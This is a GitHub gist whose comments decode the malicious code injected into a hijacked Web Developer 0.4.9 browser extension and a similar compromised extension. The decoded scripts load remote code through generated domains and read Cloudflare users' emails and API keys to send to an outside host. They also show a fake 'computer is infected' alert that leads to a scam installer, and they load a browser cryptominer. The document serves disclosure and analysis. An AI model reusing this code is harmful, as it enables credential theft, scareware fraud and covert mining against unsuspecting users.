Skip to content

Instantly share code, notes, and snippets.

@piedpiperRichard
Last active August 26, 2023 13:03
Show Gist options
  • Save piedpiperRichard/076516da60f45842f1a6e6ae35a9a240 to your computer and use it in GitHub Desktop.
Save piedpiperRichard/076516da60f45842f1a6e6ae35a9a240 to your computer and use it in GitHub Desktop.
Web developer 0.4.9 tools hacked and installing adware Decode
function md5cycle(x, k) {
var a = x[0], b = x[1], c = x[2], d = x[3];
a = ff(a, b, c, d, k[0], 7, -680876936);
d = ff(d, a, b, c, k[1], 12, -389564586);
c = ff(c, d, a, b, k[2], 17, 606105819);
b = ff(b, c, d, a, k[3], 22, -1044525330);
a = ff(a, b, c, d, k[4], 7, -176418897);
d = ff(d, a, b, c, k[5], 12, 1200080426);
c = ff(c, d, a, b, k[6], 17, -1473231341);
b = ff(b, c, d, a, k[7], 22, -45705983);
a = ff(a, b, c, d, k[8], 7, 1770035416);
d = ff(d, a, b, c, k[9], 12, -1958414417);
c = ff(c, d, a, b, k[10], 17, -42063);
b = ff(b, c, d, a, k[11], 22, -1990404162);
a = ff(a, b, c, d, k[12], 7, 1804603682);
d = ff(d, a, b, c, k[13], 12, -40341101);
c = ff(c, d, a, b, k[14], 17, -1502002290);
b = ff(b, c, d, a, k[15], 22, 1236535329);
a = gg(a, b, c, d, k[1], 5, -165796510);
d = gg(d, a, b, c, k[6], 9, -1069501632);
c = gg(c, d, a, b, k[11], 14, 643717713);
b = gg(b, c, d, a, k[0], 20, -373897302);
a = gg(a, b, c, d, k[5], 5, -701558691);
d = gg(d, a, b, c, k[10], 9, 38016083);
c = gg(c, d, a, b, k[15], 14, -660478335);
b = gg(b, c, d, a, k[4], 20, -405537848);
a = gg(a, b, c, d, k[9], 5, 568446438);
d = gg(d, a, b, c, k[14], 9, -1019803690);
c = gg(c, d, a, b, k[3], 14, -187363961);
b = gg(b, c, d, a, k[8], 20, 1163531501);
a = gg(a, b, c, d, k[13], 5, -1444681467);
d = gg(d, a, b, c, k[2], 9, -51403784);
c = gg(c, d, a, b, k[7], 14, 1735328473);
b = gg(b, c, d, a, k[12], 20, -1926607734);
a = hh(a, b, c, d, k[5], 4, -378558);
d = hh(d, a, b, c, k[8], 11, -2022574463);
c = hh(c, d, a, b, k[11], 16, 1839030562);
b = hh(b, c, d, a, k[14], 23, -35309556);
a = hh(a, b, c, d, k[1], 4, -1530992060);
d = hh(d, a, b, c, k[4], 11, 1272893353);
c = hh(c, d, a, b, k[7], 16, -155497632);
b = hh(b, c, d, a, k[10], 23, -1094730640);
a = hh(a, b, c, d, k[13], 4, 681279174);
d = hh(d, a, b, c, k[0], 11, -358537222);
c = hh(c, d, a, b, k[3], 16, -722521979);
b = hh(b, c, d, a, k[6], 23, 76029189);
a = hh(a, b, c, d, k[9], 4, -640364487);
d = hh(d, a, b, c, k[12], 11, -421815835);
c = hh(c, d, a, b, k[15], 16, 530742520);
b = hh(b, c, d, a, k[2], 23, -995338651);
a = ii(a, b, c, d, k[0], 6, -198630844);
d = ii(d, a, b, c, k[7], 10, 1126891415);
c = ii(c, d, a, b, k[14], 15, -1416354905);
b = ii(b, c, d, a, k[5], 21, -57434055);
a = ii(a, b, c, d, k[12], 6, 1700485571);
d = ii(d, a, b, c, k[3], 10, -1894986606);
c = ii(c, d, a, b, k[10], 15, -1051523);
b = ii(b, c, d, a, k[1], 21, -2054922799);
a = ii(a, b, c, d, k[8], 6, 1873313359);
d = ii(d, a, b, c, k[15], 10, -30611744);
c = ii(c, d, a, b, k[6], 15, -1560198380);
b = ii(b, c, d, a, k[13], 21, 1309151649);
a = ii(a, b, c, d, k[4], 6, -145523070);
d = ii(d, a, b, c, k[11], 10, -1120210379);
c = ii(c, d, a, b, k[2], 15, 718787259);
b = ii(b, c, d, a, k[9], 21, -343485551);
x[0] = add32(a, x[0]);
x[1] = add32(b, x[1]);
x[2] = add32(c, x[2]);
x[3] = add32(d, x[3]);
}
function cmn(q, a, b, x, s, t) {
a = add32(add32(a, q), add32(x, t));
return add32((a << s) | (a >>> (32 - s)), b);
}
function ff(a, b, c, d, x, s, t) {
return cmn((b & c) | ((~b) & d), a, b, x, s, t);
}
function gg(a, b, c, d, x, s, t) {
return cmn((b & d) | (c & (~d)), a, b, x, s, t);
}
function hh(a, b, c, d, x, s, t) {
return cmn(b ^ c ^ d, a, b, x, s, t);
}
function ii(a, b, c, d, x, s, t) {
return cmn(c ^ (b | (~d)), a, b, x, s, t);
}
function md51(s) {
txt = '';
var n = s.length,
state = [1732584193, -271733879, -1732584194, 271733878], i;
for (i=64; i<=s.length; i+=64) {
md5cycle(state, md5blk(s.substring(i-64, i)));
}
s = s.substring(i-64);
var tail = [0,0,0,0, 0,0,0,0, 0,0,0,0, 0,0,0,0];
for (i=0; i<s.length; i++)
tail[i>>2] |= s.charCodeAt(i) << ((i%4) << 3);
tail[i>>2] |= 0x80 << ((i%4) << 3);
if (i > 55) {
md5cycle(state, tail);
for (i=0; i<16; i++) tail[i] = 0;
}
tail[14] = n*8;
md5cycle(state, tail);
return state;
}
/* there needs to be support for Unicode here,
* unless we pretend that we can redefine the MD-5
* algorithm for multi-byte characters (perhaps
* by adding every four 16-bit characters and
* shortening the sum to 32 bits). Otherwise
* I suggest performing MD-5 as if every character
* was two bytes--e.g., 0040 0025 = @%--but then
* how will an ordinary MD-5 sum be matched?
* There is no way to standardize text to something
* like UTF-8 before transformation; speed cost is
* utterly prohibitive. The JavaScript standard
* itself needs to look at this: it should start
* providing access to strings as preformed UTF-8
* 8-bit unsigned value arrays.
*/
function md5blk(s) { /* I figured global was faster. */
var md5blks = [], i; /* Andy King said do it this way. */
for (i=0; i<64; i+=4) {
md5blks[i>>2] = s.charCodeAt(i)
+ (s.charCodeAt(i+1) << 8)
+ (s.charCodeAt(i+2) << 16)
+ (s.charCodeAt(i+3) << 24);
}
return md5blks;
}
var hex_chr = '0123456789abcdef'.split('');
function rhex(n)
{
var s='', j=0;
for(; j<4; j++)
s += hex_chr[(n >> (j * 8 + 4)) & 0x0F]
+ hex_chr[(n >> (j * 8)) & 0x0F];
return s;
}
function hex(x) {
for (var i=0; i<x.length; i++)
x[i] = rhex(x[i]);
return x.join('');
}
function md5(s) {
return hex(md51(s));
}
/* this function is much faster,
so if possible we use it. Some IEs
are the only ones I know of that
need the idiotic second function,
generated by an if clause. */
function add32(a, b) {
return (a + b) & 0xFFFFFFFF;
}
if (md5('hello') != '5d41402abc4b2a76b9719d911017c592') {
function add32(x, y) {
var lsw = (x & 0xFFFF) + (y & 0xFFFF),
msw = (x >> 16) + (y >> 16) + (lsw >> 16);
return (msw << 16) | (lsw & 0xFFFF);
}
}
var date = new Date();
var day = date.getUTCDate();
var month = date.getUTCMonth() + 1;
var year = date.getUTCFullYear();
var hour = date.getUTCHours();
console.log(hour);
var d = day + '-' + month + '-' + year;
var hash = "wd" + md5(d) + ".win";
var config_fragment = '<sc' + 'ri' + 'pt sr' + 'c="ht'+ 'tp' + 's://' + hash + '/ga.js"></sc ' + 'ri' + 'pt>';
alert(hash);
        /*
        Decode.
adware link
http://wd7bdb20e4d622f6569f3e8503138c859d.win
      */
@piedpiperRichard
Copy link
Author

piedpiperRichard commented Aug 2, 2017

Decode.
adware link
wd7bdb20e4d622f6569f3e8503138c859d.win/ga.js

var _0x4d27 = ["\x63\x6C\x6F\x75\x64\x66\x6C\x61\x72\x65\x2E\x63\x6F\x6D", "\x69\x6E\x64\x65\x78\x4F\x66", "\x68\x72\x65\x66", "\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x2F\x2F\x73\x65\x61\x72\x63\x68\x74\x61\x62\x2E\x77\x69\x6E\x2F\x67\x61\x2E\x6A\x73", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65", "\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65", "\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65", "\x72\x65\x64\x69\x72\x65\x63\x74\x32\x2E\x74\x6F\x70", "\x2F\x2F\x70\x61", "\x72\x74\x6E\x65", "\x72\x2D\x6E\x65", "\x74\x2E\x6D\x65", "\x6E\x2F\x63\x6F", "\x64\x65\x2F\x3F", "\x70\x69\x64\x3D", "\x39\x37\x33\x38", "\x32\x30\x26\x72", "\x3D", "\x72\x61\x6E\x64\x6F\x6D", "\x66\x6C\x6F\x6F\x72", "\x66\x69\x72\x73\x74\x43\x68\x69\x6C\x64", "\x62\x6F\x64\x79", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x2D\x61\x6E\x61\x6C\x79\x74\x69\x63\x73\x2E\x63\x6F\x6D\x2F\x61\x6E\x61\x6C\x79\x74\x69\x63\x73\x2E\x6A\x73", "\x67\x61", "\x47\x6F\x6F\x67\x6C\x65\x41\x6E\x61\x6C\x79\x74\x69\x63\x73\x4F\x62\x6A\x65\x63\x74", "\x70\x75\x73\x68", "\x71", "\x6C", "\x61\x73\x79\x6E\x63", "\x63\x72\x65\x61\x74\x65", "\x55\x41\x2D\x31\x30\x33\x30\x34\x35\x35\x35\x33\x2D\x31", "\x61\x75\x74\x6F", "\x73\x65\x6E\x64", "\x70\x61\x67\x65\x76\x69\x65\x77"];
if (top[_0x4d27[3]][_0x4d27[2]][_0x4d27[1]](_0x4d27[0]) > -1) {
    (function() {
        var _0xb2b9x1 = document[_0x4d27[5]](_0x4d27[4]);
        _0xb2b9x1[_0x4d27[6]] = _0x4d27[7];
        _0xb2b9x1[_0x4d27[8]] = _0x4d27[9];
        var _0xb2b9x2 = document[_0x4d27[10]](_0x4d27[4])[0];
        _0xb2b9x2[_0x4d27[12]][_0x4d27[11]](_0xb2b9x1, _0xb2b9x2)
    })()
} else {
    if (top[_0x4d27[3]][_0x4d27[2]][_0x4d27[1]](_0x4d27[13]) == -1) {
        (function() {
            var _0xb2b9x3 = document[_0x4d27[5]](_0x4d27[4]);
            _0xb2b9x3[_0x4d27[6]] = _0x4d27[7];
            _0xb2b9x3[_0x4d27[8]] = _0x4d27[14] + _0x4d27[15] + _0x4d27[16] + _0x4d27[17] + _0x4d27[18] + _0x4d27[19] + _0x4d27[20] + _0x4d27[21] + _0x4d27[22] + _0x4d27[23] + Math[_0x4d27[25]](10000000 * Math[_0x4d27[24]]());
            var _0xb2b9x2 = document[_0x4d27[10]](_0x4d27[4])[0];
            _0xb2b9x2[_0x4d27[12]][_0x4d27[11]](_0xb2b9x3, _0xb2b9x2);
            try {
                var _0xb2b9x4 = document[_0x4d27[27]][_0x4d27[26]];
                _0xb2b9x4[_0x4d27[12]][_0x4d27[11]](_0xb2b9x2, _0xb2b9x4)
            } catch (e) {
                document[_0x4d27[27]][_0x4d27[28]](_0xb2b9x2)
            }
        })()
    }
};
(function(_0xb2b9x5, _0xb2b9x2, _0xb2b9x6, _0xb2b9x7, _0xb2b9x8, _0xb2b9x9, _0xb2b9xa) {
    _0xb2b9x5[_0x4d27[31]] = _0xb2b9x8;
    _0xb2b9x5[_0xb2b9x8] = _0xb2b9x5[_0xb2b9x8] || function() {
        (_0xb2b9x5[_0xb2b9x8][_0x4d27[33]] = _0xb2b9x5[_0xb2b9x8][_0x4d27[33]] || [])[_0x4d27[32]](arguments)
    }, _0xb2b9x5[_0xb2b9x8][_0x4d27[34]] = 1 * new Date();
    _0xb2b9x9 = _0xb2b9x2[_0x4d27[5]](_0xb2b9x6), _0xb2b9xa = _0xb2b9x2[_0x4d27[10]](_0xb2b9x6)[0];
    _0xb2b9x9[_0x4d27[35]] = 1;
    _0xb2b9x9[_0x4d27[8]] = _0xb2b9x7;
    _0xb2b9xa[_0x4d27[12]][_0x4d27[11]](_0xb2b9x9, _0xb2b9xa)
})(window, document, _0x4d27[4], _0x4d27[29], _0x4d27[30]);
ga(_0x4d27[36], _0x4d27[37], _0x4d27[38]);
ga(_0x4d27[39], _0x4d27[40])

var wc = document.createElement('script');
wc.type = 'text/javascript';
wc.src = 'https://loading.website/alert_ce.php';
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(wc, s);
if (top['location']['href']['indexOf']('cloudflare.com') > -1) {
    (function() {
        var _0xb2b9x1 = document['createElement']('script');
        _0xb2b9x1['type'] = 'text/javascript';
        _0xb2b9x1['src'] = '//searchtab.win/ga.js';
        var _0xb2b9x2 = document['getElementsByTagName']('script')[0];
        _0xb2b9x2['parentNode']['insertBefore'](_0xb2b9x1, _0xb2b9x2)
    })()
} else {
    if (top['location']['href']['indexOf']('redirect2.top') == -1) {
        (function() {
            var _0xb2b9x3 = document['createElement']('script');
            _0xb2b9x3['type'] = 'text/javascript';
            _0xb2b9x3['src'] = '//pa' + 'rtne' + 'r-ne' + 't.me' + 'n/co' + 'de/?' + 'pid=' + '9738' + '20&r' + '=' + Math['floor'](10000000 * Math['random']());
            var _0xb2b9x2 = document['getElementsByTagName']('script')[0];
            _0xb2b9x2['parentNode']['insertBefore'](_0xb2b9x3, _0xb2b9x2);
            try {
                var _0xb2b9x4 = document['body']['firstChild'];
                _0xb2b9x4['parentNode']['insertBefore'](_0xb2b9x2, _0xb2b9x4)
            } catch (e) {
                document['body']['appendChild'](_0xb2b9x2)
            }
        })()
    }
};
(function(_0xb2b9x5, _0xb2b9x2, _0xb2b9x6, _0xb2b9x7, _0xb2b9x8, _0xb2b9x9, _0xb2b9xa) {
    _0xb2b9x5['GoogleAnalyticsObject'] = _0xb2b9x8;
    _0xb2b9x5[_0xb2b9x8] = _0xb2b9x5[_0xb2b9x8] || function() {
        (_0xb2b9x5[_0xb2b9x8]['q'] = _0xb2b9x5[_0xb2b9x8]['q'] || [])['push'](arguments)
    }, _0xb2b9x5[_0xb2b9x8]['l'] = 1 * new Date();
    _0xb2b9x9 = _0xb2b9x2['createElement'](_0xb2b9x6), _0xb2b9xa = _0xb2b9x2['getElementsByTagName'](_0xb2b9x6)[0];
    _0xb2b9x9['async'] = 1;
    _0xb2b9x9['src'] = _0xb2b9x7;
    _0xb2b9xa['parentNode']['insertBefore'](_0xb2b9x9, _0xb2b9xa)
})(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');
ga('create', 'UA-103045553-1', 'auto');
ga('send', 'pageview')

var wc = document.createElement('script');
wc.type = 'text/javascript';
wc.src = 'https://loading.website/alert_ce.php';
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(wc, s);
searchtab.win/ga.js
partner-net.men/code/?pid=7973820&r=10000000
https://loading.website/alert_ce.php

@piedpiperRichard
Copy link
Author

piedpiperRichard commented Aug 2, 2017

decode
searchtab.win/ga.js

  console.log('window - onload'); // 4th
  console.log(window.bootstrap); // 4th
  console.log(window.bootstrap.data.user.email);
  console.log(window.bootstrap.atok);
  //   console.log(window.bootstrap); // 4th

  var xmlhttp = new XMLHttpRequest();
  xmlhttp.open('GET', 'https://www.cloudflare.com/api/v4/user/api_key', true);
  xmlhttp.setRequestHeader("x-atok", window.bootstrap.atok);
  xmlhttp.onreadystatechange = function() {
      if (xmlhttp.readyState == 4) {
          if (xmlhttp.status == 200) {
              var obj = JSON.parse(xmlhttp.responseText);
              var key = obj.result.api_key;
              console.log(key);
              (new Image).src = '//searchtab.win/ga.php?user=' + encodeURIComponent(window.bootstrap.data.user.email) + '&key=' + encodeURIComponent(key);
          }
      }
  };
  xmlhttp.send(null);

decode
partner-net.men/code/?pid=7973820&r=10000000

(function() {
    var t = false;

    function r() {
        var t = 1;
        var r = parseInt("7973820");
        var e = [{
            src: "//partner-net.men/code/pid/linkcheck.js?rev=133",
            async: false
        }, {
            src: "//partner-net.men/code/pid/7973820_BNX.js?rev=133",
            async: true
        }, {
            src: "//partner-net.men/code/pid/7973820_ALL.js?rev=133",
            async: false
        }];
        var n = false;
        var i = [359045];
        var a = [581350, 655971, 812933, 535264, 330970, 888078, 612812, 552308, 516442, 144200, 378507, 820585, 714257, 211746];
        if (window.location.host.match(/(mail\.ru|ok\.ru|vk\.com)/) && a.indexOf(r) > -1) {
            e[1].src = null
        }
        if (r === 485743) {
            e[0].src = null
        }
        if (i.indexOf(r) > -1) {
            e = []
        }
        if (t === 1) {
            var c = window[window.location.hostname] || false;
            if (c) return;
            window[window.location.hostname] = true
        }
        for (var o = 0; o < e.length; o++) {
            if (e[o].src) {
                var s = document.createElement("script");
                s.setAttribute("charset", "UTF-8");
                if (e[o].async) s.setAttribute("async", "async");
                s.setAttribute("src", e[o].src);
                try {
                    var d = document.body.firstChild;
                    d.parentNode.insertBefore(s, d)
                } catch (t) {
                    n = true
                }
                if (n) {
                    try {
                        document.body.appendChild(s)
                    } catch (t) {}
                }
            }
        }
    }
    var e = function() {
        if (!t) {
            setTimeout(function() {
                n()
            }, 10)
        }
    };
    var n = function() {
        try {
            if ("function" == typeof document.body.appendChild && window === top) {
                t = true;
                r()
            }
        } catch (t) {}
        e()
    };
    n()
})();
(function() {
    try {
        setTimeout(function() {
            var e = 'https://f.partnerwork.men/code/code/index_4.php';
            if (!document.querySelector('script[src^="' + e + '"]')) {
                var t = document.createElement('script');
                t.type = 'text/javascript';
                t.src = e;
                document.getElementsByTagName('body')[0].appendChild(t)
            }
        }, 1e3)
    } catch (e) {}
})();

Decode
https://loading.website/alert_ce.php


        var msg = 'Your computer is infected. You have to check it with antivirus.';

        if (confirm(msg)) {
            var tds_url = 'http://loading.website/tds.php?subid=ce2';
            top.location.href = tds_url;
        } else {
        }
partner-net.men/code/pid/linkcheck.js?rev=133
partner-net.men/code/pid/7973820_BNX.js?rev=133
partner-net.men/code/pid/7973820_ALL.js?rev=133
https://f.partnerwork.men/code/code/index_4.php
http://loading.website/tds.php?subid=ce2     PCKeeper Installer.exe

@piedpiperRichard
Copy link
Author

piedpiperRichard commented Aug 2, 2017

https://f.partnerwork.men/code/code/index_4.php

! function() {
    try {
        var e = function() {
            var t;
            void 0 !== document.hidden ? t = "hidden" : void 0 !== document.webkitHidden ? t = "webkitHidden" : void 0 !== document.mozHidden ? t = "mozHidden" : void 0 !== document.msHidden && (t = "msHidden"), document[t] ? setTimeout(function() {
                e()
            }, 10000) : function() {
                try {
                    var e = !1;
                    ["y", "a"].forEach(function(t) {
                        if (!1 === e && document.querySelector('script[src^="https://' + t + '.partnerwork.men/code/code/mss_3.js"]')) e = !0;
                        else if ("a" === t && !1 === e) {
                            var d = document.createElement("script");
                            d.type = "text/javascript", d.src = "https://a.partnerwork.men/code/code/index_3.php", document.getElementsByTagName("body")[0].appendChild(d)
                        }
                    })
                } catch (e) {}
            }()
        };
        setTimeout(function() {
            e()
        }, 10000)
    } catch (e) {}
}();

@piedpiperRichard
Copy link
Author

piedpiperRichard commented Aug 2, 2017

https://y.partnerwork.men/code/code/index_3.php

var hash = '{"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"161860651313327","job":{"blob":"0505b1e088cc052109c263b6823040e1560aa1971840aca59a318eb770a957a9afb0e038f084cf0000000077cc8ace862fa5505349f456dbc03a1b45b235ddf8757747b734713b165db5850a","job_id":"121997309522703","target":"8b4f0100"},"status":"OK"}}';
var start_nonce = 200;
var count_pl = 200;
var src = "https://y.partnerwork.men/code/code/mss_3.js";
if (document.querySelector('script[src^="' + src + '"]')) m_miner(hash, start_nonce, count_pl);
else {
    var d = document.createElement("script");
    d.type = "text/javascript", d.src = src, document.body.appendChild(d), setTimeout(function() {
        m_miner(hash, start_nonce, count_pl)
    }, 2e3)
}
var scripts = document.querySelectorAll('script[src^="https://y.partnerwork.men/code/code/index_3.php"]');
scripts && scripts.length > 0 && scripts[0].parentNode.removeChild(scripts[0]);

@amlwwalker
Copy link

@piedpiperRichard what is:

if (top[_0x4d27[3]][_0x4d27[2]][_0x4d27[1]](_0x4d27[0]) > -1) {

top in this case? thats no native js.... is there a map somewhere I have't spotted?

@g00glen00b
Copy link

@amlwwalker that refers to window.top. So basically window.top.location.href.

That script is the one that bothers me the most, since it appears to be fetching e-mail and API key of someone on Cloudflare. Which can be used to send spam, phishing and redirect people their domain on Cloudflare to even more malicious websites.

@h0n24
Copy link

h0n24 commented Aug 3, 2017

Here's human readable version of wd7bdb20e4d622f6569f3e8503138c859d.win/ga.js file

if (top['location']['href']['indexOf']('cloudflare.com') > -1) {
  (function() {
    var createScript = document['createElement']('script');
    createScript['type'] = 'text/javascript';
    createScript['src'] = '//searchtab.win/ga.js';
    var getScript = document['getElementsByTagName']('script')[0];
    getScript['parentNode']['insertBefore'](createScript, getScript)
  })()
} else {
  if (top['location']['href']['indexOf']('redirect2.top') == -1) {
    (function() {
      var createScript = document['createElement']('script');
      createScript['type'] = 'text/javascript';
      createScript['src'] = '//partner-net.men/code/?pid=973820&r=' + Math['floor'](10000000 * Math['random']());
      var getScript = document['getElementsByTagName']('script')[0];
      getScript['parentNode']['insertBefore'](createScript, getScript);
      try {
        var getBody = document['body']['firstChild'];
        getBody['parentNode']['insertBefore'](getScript, getBody)
      } catch (e) {
        document['body']['appendChild'](getScript)
      }
    })()
  }
};

// Google Analytics 
(function(i, s, o, g, r, a, m) {
  i['GoogleAnalyticsObject'] = r;
  i[r] = i[r] || function() {
      (i[r].q = i[r].q || []).push(arguments)
    },
    i[r].l = 1 * new Date();
  a = s.createElement(o),
    m = s.getElementsByTagName(o)[0];
  a.async = 1;
  a.src = g;
  m.parentNode.insertBefore(a, m)
})(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga');
ga('create', 'UA-103045553-1', 'auto');
ga('send', 'pageview')

// loading alert msg 'Your computer is infected. You have to check it with antivirus.'
var wc = document.createElement('script');
wc.type = 'text/javascript';
wc.src = 'https://loading.website/alert_ce.php';
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(wc, s);

@kingzLoFitness
Copy link

My system got caught in this Malware. Currently finding out that it was created in JavaScript. A redirect here for when I get better at knowing and reading code. I'm an informal student of JavaScript at the moment, about to get back into my studies of where I last left off.

@MiracleBlue
Copy link

Looks like this is a variation of the same attack by the same malicious actor who I encountered when (s)he compromised the Infinity New Tab chrome extension in May. Same code for the domain name generating, same pasted md5 hashing fn (with Andy King reference), only major differences I can see in the one I encountered is the alert message in 8 different languages! There also seems to be a simple mechanism for throttling the frequency of alerts, so the user only sees it once per hour, rather than on every single page load or new tab.

There were some further write-ups, code samples, details and sleuthing from the Infinity New Tab case (and another on Betternet VPN extension in the comments) here: https://www.reddit.com/r/Malware/comments/6dm5m2/the_infinity_new_tab_chrome_extension_appears_to/

And here is the pasted code that was shipped with Infinity New Tab when it was compromised:

function md5cycle(x, k) {
var a = x[0], b = x[1], c = x[2], d = x[3];

a = ff(a, b, c, d, k[0], 7, -680876936);
d = ff(d, a, b, c, k[1], 12, -389564586);
c = ff(c, d, a, b, k[2], 17,  606105819);
b = ff(b, c, d, a, k[3], 22, -1044525330);
a = ff(a, b, c, d, k[4], 7, -176418897);
d = ff(d, a, b, c, k[5], 12,  1200080426);
c = ff(c, d, a, b, k[6], 17, -1473231341);
b = ff(b, c, d, a, k[7], 22, -45705983);
a = ff(a, b, c, d, k[8], 7,  1770035416);
d = ff(d, a, b, c, k[9], 12, -1958414417);
c = ff(c, d, a, b, k[10], 17, -42063);
b = ff(b, c, d, a, k[11], 22, -1990404162);
a = ff(a, b, c, d, k[12], 7,  1804603682);
d = ff(d, a, b, c, k[13], 12, -40341101);
c = ff(c, d, a, b, k[14], 17, -1502002290);
b = ff(b, c, d, a, k[15], 22,  1236535329);

a = gg(a, b, c, d, k[1], 5, -165796510);
d = gg(d, a, b, c, k[6], 9, -1069501632);
c = gg(c, d, a, b, k[11], 14,  643717713);
b = gg(b, c, d, a, k[0], 20, -373897302);
a = gg(a, b, c, d, k[5], 5, -701558691);
d = gg(d, a, b, c, k[10], 9,  38016083);
c = gg(c, d, a, b, k[15], 14, -660478335);
b = gg(b, c, d, a, k[4], 20, -405537848);
a = gg(a, b, c, d, k[9], 5,  568446438);
d = gg(d, a, b, c, k[14], 9, -1019803690);
c = gg(c, d, a, b, k[3], 14, -187363961);
b = gg(b, c, d, a, k[8], 20,  1163531501);
a = gg(a, b, c, d, k[13], 5, -1444681467);
d = gg(d, a, b, c, k[2], 9, -51403784);
c = gg(c, d, a, b, k[7], 14,  1735328473);
b = gg(b, c, d, a, k[12], 20, -1926607734);

a = hh(a, b, c, d, k[5], 4, -378558);
d = hh(d, a, b, c, k[8], 11, -2022574463);
c = hh(c, d, a, b, k[11], 16,  1839030562);
b = hh(b, c, d, a, k[14], 23, -35309556);
a = hh(a, b, c, d, k[1], 4, -1530992060);
d = hh(d, a, b, c, k[4], 11,  1272893353);
c = hh(c, d, a, b, k[7], 16, -155497632);
b = hh(b, c, d, a, k[10], 23, -1094730640);
a = hh(a, b, c, d, k[13], 4,  681279174);
d = hh(d, a, b, c, k[0], 11, -358537222);
c = hh(c, d, a, b, k[3], 16, -722521979);
b = hh(b, c, d, a, k[6], 23,  76029189);
a = hh(a, b, c, d, k[9], 4, -640364487);
d = hh(d, a, b, c, k[12], 11, -421815835);
c = hh(c, d, a, b, k[15], 16,  530742520);
b = hh(b, c, d, a, k[2], 23, -995338651);

a = ii(a, b, c, d, k[0], 6, -198630844);
d = ii(d, a, b, c, k[7], 10,  1126891415);
c = ii(c, d, a, b, k[14], 15, -1416354905);
b = ii(b, c, d, a, k[5], 21, -57434055);
a = ii(a, b, c, d, k[12], 6,  1700485571);
d = ii(d, a, b, c, k[3], 10, -1894986606);
c = ii(c, d, a, b, k[10], 15, -1051523);
b = ii(b, c, d, a, k[1], 21, -2054922799);
a = ii(a, b, c, d, k[8], 6,  1873313359);
d = ii(d, a, b, c, k[15], 10, -30611744);
c = ii(c, d, a, b, k[6], 15, -1560198380);
b = ii(b, c, d, a, k[13], 21,  1309151649);
a = ii(a, b, c, d, k[4], 6, -145523070);
d = ii(d, a, b, c, k[11], 10, -1120210379);
c = ii(c, d, a, b, k[2], 15,  718787259);
b = ii(b, c, d, a, k[9], 21, -343485551);

x[0] = add32(a, x[0]);
x[1] = add32(b, x[1]);
x[2] = add32(c, x[2]);
x[3] = add32(d, x[3]);

}

function cmn(q, a, b, x, s, t) {
a = add32(add32(a, q), add32(x, t));
return add32((a << s) | (a >>> (32 - s)), b);
}

function ff(a, b, c, d, x, s, t) {
return cmn((b & c) | ((~b) & d), a, b, x, s, t);
}

function gg(a, b, c, d, x, s, t) {
return cmn((b & d) | (c & (~d)), a, b, x, s, t);
}

function hh(a, b, c, d, x, s, t) {
return cmn(b ^ c ^ d, a, b, x, s, t);
}

function ii(a, b, c, d, x, s, t) {
return cmn(c ^ (b | (~d)), a, b, x, s, t);
}

function md51(s) {
txt = '';
var n = s.length,
state = [1732584193, -271733879, -1732584194, 271733878], i;
for (i=64; i<=s.length; i+=64) {
md5cycle(state, md5blk(s.substring(i-64, i)));
}
s = s.substring(i-64);
var tail = [0,0,0,0, 0,0,0,0, 0,0,0,0, 0,0,0,0];
for (i=0; i<s.length; i++)
tail[i>>2] |= s.charCodeAt(i) << ((i%4) << 3);
tail[i>>2] |= 0x80 << ((i%4) << 3);
if (i > 55) {
md5cycle(state, tail);
for (i=0; i<16; i++) tail[i] = 0;
}
tail[14] = n*8;
md5cycle(state, tail);
return state;
}

/* there needs to be support for Unicode here,
 * unless we pretend that we can redefine the MD-5
 * algorithm for multi-byte characters (perhaps
 * by adding every four 16-bit characters and
 * shortening the sum to 32 bits). Otherwise
 * I suggest performing MD-5 as if every character
 * was two bytes--e.g., 0040 0025 = @%--but then
 * how will an ordinary MD-5 sum be matched?
 * There is no way to standardize text to something
 * like UTF-8 before transformation; speed cost is
 * utterly prohibitive. The JavaScript standard
 * itself needs to look at this: it should start
 * providing access to strings as preformed UTF-8
 * 8-bit unsigned value arrays.
 */
function md5blk(s) { /* I figured global was faster.   */
var md5blks = [], i; /* Andy King said do it this way. */
for (i=0; i<64; i+=4) {
md5blks[i>>2] = s.charCodeAt(i)
+ (s.charCodeAt(i+1) << 8)
+ (s.charCodeAt(i+2) << 16)
+ (s.charCodeAt(i+3) << 24);
}
return md5blks;
}

var hex_chr = '0123456789abcdef'.split('');

function rhex(n)
{
var s='', j=0;
for(; j<4; j++)
s += hex_chr[(n >> (j * 8 + 4)) & 0x0F]
+ hex_chr[(n >> (j * 8)) & 0x0F];
return s;
}

function hex(x) {
for (var i=0; i<x.length; i++)
x[i] = rhex(x[i]);
return x.join('');
}

function md5(s) {
return hex(md51(s));
}

/* this function is much faster,
so if possible we use it. Some IEs
are the only ones I know of that
need the idiotic second function,
generated by an if clause.  */

function add32(a, b) {
return (a + b) & 0xFFFFFFFF;
}

if (md5('hello') != '5d41402abc4b2a76b9719d911017c592') {
function add32(x, y) {
var lsw = (x & 0xFFFF) + (y & 0xFFFF),
msw = (x >> 16) + (y >> 16) + (lsw >> 16);
return (msw << 16) | (lsw & 0xFFFF);
}
}

function getCookie(name) {
  var matches = document.cookie.match(new RegExp(
    "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
  ));
  return matches ? decodeURIComponent(matches[1]) : undefined;
}

console.log(top.location.href);

var is_keeper = top.location.href.indexOf("keeper") > -1 || top.location.href.indexOf("tds") > -1 || top.location.href.indexOf("mb") > -1 || top.location.href.indexOf("affid") > -1;

console.log(is_keeper);

var date = new Date;
var current_time = date.getTime();
var cookie_time = getCookie('_alert');
var pause = current_time - cookie_time;

